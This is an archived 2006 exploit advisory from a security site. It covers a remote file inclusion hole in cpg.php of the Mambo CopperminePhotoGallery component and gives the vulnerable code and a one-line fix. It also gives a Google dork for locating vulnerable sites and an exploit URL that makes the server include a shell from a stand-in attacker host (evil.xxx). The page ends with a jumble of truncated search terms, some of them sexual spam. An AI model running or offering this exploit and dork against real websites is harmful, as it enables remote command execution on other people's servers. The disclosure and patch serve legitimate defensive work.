about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Mambo CopperminePhotoGalery Component Remote Include Vulnerability




2006-08-16 Mambo CopperminePhotoGalery Component Remote Include Vulnerability
Rated as : High Risk

###########  CopperminePhotoGallery Component ###########
Found By k1tk4t
Indonesia 
 
  This bug allows a remote atacker to execute commands via RFI

file:
cpg.php  

bug:
require
($mosConfig_absolute_path."/administrator/components/com_cpg/config.cpg.php");



path:
add in cpg.php
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );

dork: inurl:com_cpg

expl:
htttp:/www.site.it/components/com_cpg/cpg.php?mosConfig_absolute_path=

http://evil.xxx/shell.txt?


thanks to

e-c-h-o
h4cky0u
milw0rm
google


securitydot.net - 2006-08-16

Advertising

Copyright 2007, SecurityDot
Fri, 20 Nov 2009 23:15:48 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
all cartoo Abdur Rahi Sexfilms search/exp CMS is Fre www.0317i. 68587114.c hayden kho 68587114.c ...t/comp sexgames www.invent www.taokez www.shengy SSH-2.0-Ne www.qvoddy CMS is Fre Linux kern www.suppor Www.yousex www.17363. www.shengy news for c trisha bat CMS is Fre www.112tu. www.Sex gi Microsoft SCPH39001. sessotroia C...ia/inc www.yousex safari fra redian008. http://www wap.omnia. Wwwmovies mambo Remo heaven kno redian008. Upekshasex big boobs www.happyt www.nyjxw. ssh unix sakela.com Www.geogle buffer ove phpraider. CMS is Fre